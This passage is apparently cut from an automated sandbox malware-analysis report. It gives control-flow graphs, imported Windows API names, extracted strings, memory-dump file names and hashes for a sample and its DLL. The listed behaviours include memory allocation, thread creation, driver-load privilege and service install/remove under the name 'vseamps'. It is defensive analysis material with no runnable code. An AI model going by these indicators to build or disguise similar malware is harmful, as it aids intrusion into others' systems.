14370->14371 14371->14369 14373 14000c20c sprintf_s 14372->14373 14374 14000c212 sprintf_s 14373->14374 14375 14000c22c SetFilePointer 14373->14375 14374->14315 14376 14000c24a GetLastError 14375->14376 14377 14000c254 sprintf_s 14375->14377 14376->14377 14377->14315 13944 140006c95 13946 140006d7b 13944->13946 13947 140006d9d 13944->13947 13945 140006f95 NtAllocateVirtualMemory 13945->13947 13946->13945 13946->13947 14379 1400054e0 14380 14000552c 14379->14380 14383 140005506 sprintf_s 14379->14383 14392 1400074d0 14380->14392 14384 140008370 3 API calls 14388 140005545 _SetImageBase 14384->14388 14385 1400055b8 14386 140008de0 _lock 2 API calls 14385->14386 14387 1400055c0 sprintf_s 14386->14387 14387->14383 14388->14385 14396 1400074f0 14388->14396 14391 1400055b0 GetLastError 14391->14385 14394 140007333 14392->14394 14393 140005536 14393->14384 14394->14393 14395 1400073e0 LdrLoadDll 14394->14395 14395->14394 14398 140007333 14396->14398 14397 140005561 CreateThread 14397->14387 14397->14391 14398->14397 14399 1400073e0 LdrLoadDll 14398->14399 14399->14398

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 159 140006fdc-140007020 155->159 156->132 160 140006f37-140006f7a 157->160 158->160 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 164 140007039-140007058 161->164 165 14000705a-140007062 161->165 162->151 163->162 164->161 168 14000706e-14000707b 165->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@
                                      • API String ID: 0-149943524
                                      • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                      • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: File$CreateReadmalloc
                                      • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                      • API String ID: 3950102678-3381721293
                                      • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                      • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 25 7ffe1a4c1c00-7ffe1a4c1c06 26 7ffe1a4c1c08-7ffe1a4c1c0b 25->26 27 7ffe1a4c1c41-7ffe1a4c1c4b 25->27 29 7ffe1a4c1c0d-7ffe1a4c1c10 26->29 30 7ffe1a4c1c35-7ffe1a4c1c74 call 7ffe1a4c2470 26->30 28 7ffe1a4c1d68-7ffe1a4c1d7d 27->28 34 7ffe1a4c1d8c-7ffe1a4c1da6 call 7ffe1a4c2304 28->34 35 7ffe1a4c1d7f 28->35 32 7ffe1a4c1c28 __scrt_dllmain_crt_thread_attach 29->32 33 7ffe1a4c1c12-7ffe1a4c1c15 29->33 45 7ffe1a4c1c7a-7ffe1a4c1c8f call 7ffe1a4c2304 30->45 46 7ffe1a4c1d42 30->46 41 7ffe1a4c1c2d-7ffe1a4c1c34 32->41 37 7ffe1a4c1c17-7ffe1a4c1c20 33->37 38 7ffe1a4c1c21-7ffe1a4c1c26 call 7ffe1a4c23b4 33->38 48 7ffe1a4c1da8-7ffe1a4c1dd9 call 7ffe1a4c242c call 7ffe1a4c22d4 call 7ffe1a4c27b4 call 7ffe1a4c25d0 call 7ffe1a4c25f4 call 7ffe1a4c245c 34->48 49 7ffe1a4c1ddb-7ffe1a4c1e0c call 7ffe1a4c2630 34->49 39 7ffe1a4c1d81-7ffe1a4c1d8b 35->39 38->41 58 7ffe1a4c1d5a-7ffe1a4c1d67 call 7ffe1a4c2630 45->58 59 7ffe1a4c1c95-7ffe1a4c1ca6 call 7ffe1a4c2374 45->59 50 7ffe1a4c1d44-7ffe1a4c1d59 46->50 48->39 60 7ffe1a4c1e1d-7ffe1a4c1e23 49->60 61 7ffe1a4c1e0e-7ffe1a4c1e14 49->61 58->28 77 7ffe1a4c1ca8-7ffe1a4c1ccc call 7ffe1a4c2778 call 7ffe1a4c22c4 call 7ffe1a4c22e8 call 7ffe1a4c7b10 59->77 78 7ffe1a4c1cf7-7ffe1a4c1d01 call 7ffe1a4c25d0 59->78 62 7ffe1a4c1e65-7ffe1a4c1e6d call 7ffe1a4c1720 60->62 63 7ffe1a4c1e25-7ffe1a4c1e2f 60->63 61->60 67 7ffe1a4c1e16-7ffe1a4c1e18 61->67 79 7ffe1a4c1e72-7ffe1a4c1e7b 62->79 69 7ffe1a4c1e36-7ffe1a4c1e3c 63->69 70 7ffe1a4c1e31-7ffe1a4c1e34 63->70 68 7ffe1a4c1f02-7ffe1a4c1f0f 67->68 75 7ffe1a4c1e3e-7ffe1a4c1e44 69->75 70->75 82 7ffe1a4c1ef8-7ffe1a4c1f00 75->82 83 7ffe1a4c1e4a-7ffe1a4c1e5f call 7ffe1a4c1c00 75->83 77->78 127 7ffe1a4c1cce-7ffe1a4c1cd5 __scrt_dllmain_after_initialize_c 77->127 78->46 99 7ffe1a4c1d03-7ffe1a4c1d0f call 7ffe1a4c2620 78->99 86 7ffe1a4c1e7d-7ffe1a4c1e7f 79->86 87 7ffe1a4c1eb3-7ffe1a4c1eb5 79->87 82->68 83->62 83->82 86->87 95 7ffe1a4c1e81-7ffe1a4c1ea3 call 7ffe1a4c1720 call 7ffe1a4c1d68 86->95 90 7ffe1a4c1eb7-7ffe1a4c1eba 87->90 91 7ffe1a4c1ebc-7ffe1a4c1ed1 call 7ffe1a4c1c00 87->91 90->82 90->91 91->82 109 7ffe1a4c1ed3-7ffe1a4c1edd 91->109 95->87 120 7ffe1a4c1ea5-7ffe1a4c1eaa 95->120 117 7ffe1a4c1d11-7ffe1a4c1d1b call 7ffe1a4c2538 99->117 118 7ffe1a4c1d35-7ffe1a4c1d40 99->118 115 7ffe1a4c1edf-7ffe1a4c1ee2 109->115 116 7ffe1a4c1ee4-7ffe1a4c1ef2 109->116 121 7ffe1a4c1ef4 115->121 116->121 117->118 126 7ffe1a4c1d1d-7ffe1a4c1d2b 117->126 118->50 120->87 121->82 126->118 127->78 128 7ffe1a4c1cd7-7ffe1a4c1cf4 call 7ffe1a4c7acc 127->128 128->78
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 190073905-0
                                      • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction ID: c11427a434413400df06f7cdca90558535d01ad2ce6b14406aa64165282b611b
                                      • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction Fuzzy Hash: 4881A021F08F4386FB54AB6B94412792290AF55FA0F9440F7EA4D877BADE7CE4758700

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                      • String ID: WordpadFilter.db
                                      • API String ID: 868324331-3647581008
                                      • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction ID: 7314588c29a8c0528819b79a0fe5b1c2e11593ad4fc28775d3d306be9d11dd8e
                                      • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction Fuzzy Hash: BC316B32B15F4189E700CBA2D8402BD73B5EB98B98F5485B6EE8C13B59EF38D161C740

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 196 7ffe1a4c11b0-7ffe1a4c1207 197 7ffe1a4c1209-7ffe1a4c1222 call 7ffe1a4d1490 196->197 198 7ffe1a4c124b-7ffe1a4c124e 196->198 207 7ffe1a4c123e 197->207 208 7ffe1a4c1224-7ffe1a4c1227 197->208 200 7ffe1a4c14b8-7ffe1a4c14bf 198->200 201 7ffe1a4c1254-7ffe1a4c1280 198->201 205 7ffe1a4c14c3-7ffe1a4c14ea call 7ffe1a4c1b70 200->205 203 7ffe1a4c12f6-7ffe1a4c1335 call 7ffe1a4c1b90 call 7ffe1a4d0a50 201->203 204 7ffe1a4c1282-7ffe1a4c128f 201->204 233 7ffe1a4c1340-7ffe1a4c13cb 203->233 210 7ffe1a4c14f1-7ffe1a4c14f6 call 7ffe1a4c1a40 204->210 211 7ffe1a4c1295-7ffe1a4c129c 204->211 214 7ffe1a4c1241-7ffe1a4c1246 207->214 213 7ffe1a4c1229-7ffe1a4c123c call 7ffe1a4d1490 208->213 208->214 223 7ffe1a4c14f7-7ffe1a4c14ff call 7ffe1a4c1110 210->223 217 7ffe1a4c12c7-7ffe1a4c12cf call 7ffe1a4c1b90 211->217 218 7ffe1a4c129e-7ffe1a4c12a5 211->218 213->207 213->208 214->198 231 7ffe1a4c12d2-7ffe1a4c12f1 call 7ffe1a4d0e10 217->231 218->223 224 7ffe1a4c12ab-7ffe1a4c12b3 call 7ffe1a4c1b90 218->224 234 7ffe1a4c12b9-7ffe1a4c12c5 224->234 235 7ffe1a4c14eb-7ffe1a4c14f0 call 7ffe1a4c79cc 224->235 231->203 233->233 237 7ffe1a4c13d1-7ffe1a4c13da 233->237 234->231 235->210 240 7ffe1a4c13e0-7ffe1a4c1402 237->240 241 7ffe1a4c1411-7ffe1a4c142c 240->241 242 7ffe1a4c1404-7ffe1a4c140e 240->242 241->240 244 7ffe1a4c142e-7ffe1a4c1436 241->244 242->241 245 7ffe1a4c1498-7ffe1a4c14a6 244->245 246 7ffe1a4c1438-7ffe1a4c143b 244->246 248 7ffe1a4c14a8-7ffe1a4c14b5 call 7ffe1a4c1bcc 245->248 249 7ffe1a4c14b6 245->249 247 7ffe1a4c1440-7ffe1a4c1449 246->247 250 7ffe1a4c144b-7ffe1a4c1453 247->250 251 7ffe1a4c1455-7ffe1a4c1465 247->251 248->249 249->205 250->251 253 7ffe1a4c1467-7ffe1a4c146e 251->253 254 7ffe1a4c1470-7ffe1a4c1496 251->254 253->254 254->245 254->247
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 73155330-0
                                      • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction ID: 19df4b84370db2817a60840da5fb6b64f87d5c1891b27b80e32b4c5216d2fd89
                                      • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction Fuzzy Hash: 2A815D22B19F9245E7118B3A9800179A694FF56FE4F548376EF5D637A6EF3CE0A18300

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 272 140007552 271->272 273 140007537-140007554 271->273 272->260 273->264 274->256 275->260
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                      • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3526400053-0
                                      • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                      • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                      • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                      • API String ID: 3408796845-4213300970
                                      • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                      • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                      • String ID: ampStopSingletone: logging ended
                                      • API String ID: 2048888615-3533855269
                                      • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                      • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ErrorLastManagerOpen$FileModuleName
                                      • String ID: /remove$/service$vseamps
                                      • API String ID: 67513587-3839141145
                                      • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                      • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                      • String ID:
                                      • API String ID: 4284112124-0
                                      • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                      • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                      • String ID: vseamps
                                      • API String ID: 3693165506-3944098904
                                      • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                      • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: FileModuleName
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 514040917-4022980321
                                      • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                      • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 2057259594-0
                                      • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                      • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
